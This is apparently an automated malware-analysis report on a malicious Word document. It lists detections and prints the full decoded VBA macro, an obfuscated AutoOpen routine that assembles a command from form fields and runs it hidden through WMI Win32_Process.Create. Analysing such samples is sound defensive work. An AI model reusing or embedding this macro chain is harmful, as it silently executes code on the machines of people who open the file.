Verdict: MALICIOUS
Risk score: 250
Heuristics: 8
- ClamAV: Doc.Malware.Sagent-6971199-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6971199-0
- VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  Matched line in script: `Set O7915408 = i32_09(GetObject("winmgmts:Win32_P" + "rocess"))`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  Matched line in script: `Set O7915408 = i32_09(GetObject("winmgmts:Win32_P" + "rocess"))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: `autoopen()`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7954 bytes | 9b8d702396a50184e0d4c8678068c6d9669caf77c485ce0886656f624034302f |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "U7__0_2"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "E15741"
Attribute VB_Base = "0{385981A0-4F92-4FC0-B53A-3F985D0E0E8D}{06DEAA44-9530-4C6C-B3CE-EC724C705645}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "l393667"
Attribute VB_Name = "F9065_1"
Attribute VB_Base = "0{A57093E9-F0B8-4071-B174-B42496A92819}{58E5F28B-A7F4-402E-A3D7-D2E8A964EF30}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "J066_7_9"
Function i32_09(i2962_8)
While U5697_8 And X170170_
_
_
_
'r64934Q5_8742_E6045383r827295
'd367_5p54817_0c212_9f4460_
_
_
_
_
'W880__74M8922946z538_996f47324
Wend
While X4_14227 And c3__8958
_
_
_
'f6723_1W_8__10P179416m543_2
'z90942u00410F56902i03623_
_
_
_
_
'p1107_j63841N278940K50918
Wend
Set i32_09 = CVar(i2962_8)
While j44183 And D607075
_
_
_
'O_49_773f4_489_0c438309G6306_35
'n8087341t_9814i629_3_3b55472_
_
_
_
_
'k7509852b9216997j850_780h82832
Wend
While U8061626 And j830889
_
_
_
'H3260166J190792r652582N35619
'P3156_5V0982773n28982b_81_3
_
_
_
_
'w2246_1O27270X068544u334_787
Wend
While W60917 And V4192007
_
_
_
'q_90805i3__3419U16160_G47836
'U70141j65051N65403C1942686
_
_
_
_
'j3_41_s5710146F23272_3H39_135
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While c23943_ And E6597021
_
_
_
'r666_5s744_08m400180D584536
'z184459X977256W2908045a3100482
_
_
_
_
'A61_350M40_610R9__01W_8353
Wend
While Z742_8 And V399362
_
_
_
'r12642i6_85719t8885_2K463887
'J625434p_88151X28259b23410_5
_
_
_
_
'R55553f_6423H6_115_F_492936
Wend
While L07923_6 And A__77_9
_
_
_
'w51477i55_289w417411W29428
'B437121E55033z53784d2_05493
_
_
_
_
'Y5002__1H3309123T_396129j3269752
Wend
Call S8931_
While m4946477 And w51656
_
_
_
'w4582833I1060493M3737231z907085
'E13106X698359i22_6239L48309_
_
_
_
_
'z3991897n5112_4_v141251r_35_6
Wend
While Y784536_ And s38_8679
_
_
_
'Y5094371w1_4543_Z33_59o67915
'n01386r94575F633305P355216
_
_
_
_
'f5_651H76385i73_0056L788993
Wend
End Sub
Attribute VB_Name = "i7131190"
Function S8931_()
On Error Resume Next
While r7483213 And B__0_88
_
_
_
'u837283A390_52X64292_8v436__
'f121_6G72_79L729_276m1990_
_
_
_
_
'Z19579w467726T97365r9854935
Wend
While D503377 And v4531452
_
_
_
'i816776Z4763048s466687i_8288
'B_478580p3497_9F279_7w03007_
_
_
_
_
'J9209814o0485866I4_4_91w75699_
Wend
D87232 = E15741.C05431.PasswordChar + F9065_1.G191_494 + E15741.C05431.ControlTipText + F9065_1.S2970591 + E15741.C05431.ControlTipText + E15741.C05431 + F9065_1.K_0_9655 + E15741.C05431.ControlSource + E15741.C05431.ControlSource + F9065_1.A5894_3 + E15741.C05431.ControlTipText + F9065_1.r87925 + E15741.C05431.ControlSource
While f082232 And c3552_
_
_
_
'r56_0807W825_0B42642N131347
'P45930E8__247u48414T95802
_
_
_
_
'K8644958V47297T36_3_t110370
Wend
While d831309 And w4_3072
_
_
_
'O4003594W60_02_4N0_469J3640041
'Z93_5_20F2_40_7b553123j17963
_
_
_
_
'n45_388D42603_P16203H10478
Wend
While E94356 And i935800
_
_
_
'm92867p91_420h822_960L0733835
'a734979T759_33o1701997m319433
_
_
_
_
't45_331F7118377Y663446r26829
Wend
Set O7915408 = i32_09(GetObject("winmgmts:Win32_P" + "rocess"))
While u936629 And J_055167
_
_
_
'z6323548X98001q_6804G0154400
'l8_135c53_65p_23706Y7182_
_
_
_
_
't422992q3625820m1502698V55557
Wend
While M8228457 And U44_3154
_
_
_
'b2245539i080894w2347446p017322
'j3282_36O589449a11__588U8736_
_
_
_
_
'X245981_F84603f4335472i3308642
Wend
While a57_790 And q48172
_
_
_
'v55_3_U_7489U37140z6_0808_
'S695451q36816S7_9126_i56479
_
_
_
_
'O4__2_6j69_413b845356W868867
Wend
O7915408.Create U5_44796 + D87232 + Q44_24, t17597, u6_1856, A_0352
While c_129371 And j88170
_
_
_
'V_357566f84347B1677574Z090_0_5
'V77327k54179J059046K49963
_
_
_
_
'P55646_1Z663_14B_3220O7432424
Wend
While W2194859 And c6767_44
_
_
_
'E1_5625n5_5_88n_31_75w_386_0_
'j42343c179_0_N1251256F017145
_
_
_
_
'h80021I2_48_v397299l8667665
Wend
End Function
Attribute VB_Name = "v55858"
Public Function u6_1856()
While s_452_ And o64211
_
_
_
'V45964r_1751A249893M6435951
'V5277917p792_208i281490L7614__
_
_
_
_
'o_72100J4309601D49_22_3V2_44_7
Wend
While T48231 And I24494
_
_
_
'E57972j38759w_515550n4924_20
'L_83566E943449q8185058t857658
_
_
_
_
'J8__56V1597141b6008__k3097578
Wend
While J653434_ And I9266__9
_
_
_
'u146460_P71795v7886477w3_09592
'u955__66l1540_3A0982_9u707480
_
_
_
_
'M97010s08_9378I13537H829859
Wend
Set u6_1856 = i32_09(GetObject("winmgmts:Win32_P" + "rocessStartup"))
While z281__1 And p7787364
_
_
_
'I74946M_80983L234__6I_3922
'E08456_j1090598m82892z469613
_
_
_
_
'H2073_3l536610s_3033B4_706
Wend
While i7439113 And a073911
_
_
_
'U73886X5_264_2n94333i58966
'H25_78i005_7H039_2s60228
_
_
_
_
'o630886G745531j7381_9G0110_
Wend
j6014__5 = vbError - vbError
While z460140 And a7921_
_
_
_
'r349583i8_3799b186339H9_531
'o097849H2009_87n412_981K60731_
_
_
_
_
't9097189q400401o0_36468f91196
Wend
While W1729992 And p81634
_
_
_
'r964035H87_2_56w60258n08088_5
'F3485_8U8971619h1824862w_9905
_
_
_
_
'O106__43j58_05W211_05W0_88_16
Wend
While z6_27044 And k_652514
_
_
_
'P8_21115Z6_15564r940873O539554
'G79_8733w909002H659495n78208
_
_
_
_
'h_287689U74030_5q5234_54v3813357
Wend
With u6_1856
While d60979 And l632123
_
_
_
'w57655Y3306402I629_025V72572
'b7324_1a324_0c02685Z50104
_
_
_
_
'R777_3V7822969A321933a3552021
Wend
While R30__203 And C9613763
_
_
_
'w_7525j50_89o79_9306i3833074
'l607577G29340_6n21549U2_54_5
_
_
_
_
'o36378l0_55453M82690z_9999
Wend
. _
ShowWindow = j6014__5 + j6014__5 + j6014__5 + j6014__5 + j6014__5 + j6014__5 + j6014__5
While v1_08058 And s477851
_
_
_
'c475528X36_342B2324_0_m_204__
'i6816_3v1454513B776327T314999
_
_
_
_
'I93140L4899286D160_504i6860815
Wend
While k364127 And X1168640
_
_
_
'L4_477C35348_t32919a75727
'V518_0k764395N5867276A1008_
_
_
_
_
'O023_661G19200t90363n7080549
Wend
End With
While D36715_ And w2584743
_
_
_
'c8658276f95156B91161F61205
'O860066z42954w3506264G58220
_
_
_
_
'i__5641_z4923403p717465q240780
Wend
While S9628205 And h246957
_
_
_
'q168_8T_56_76k347_0H60292
'h9002760Y2_8698S2503379V70_6408
_
_
_
_
'E95165a_1635L_88703_j3647285
Wend
While C39_835 And r28438
_
_
_
'I49956R7310737I9229125p101716
'f797147H3_11569c88178m36920
_
_
_
_
'L52292_5i91569_m_720_10S21053
Wend
End Function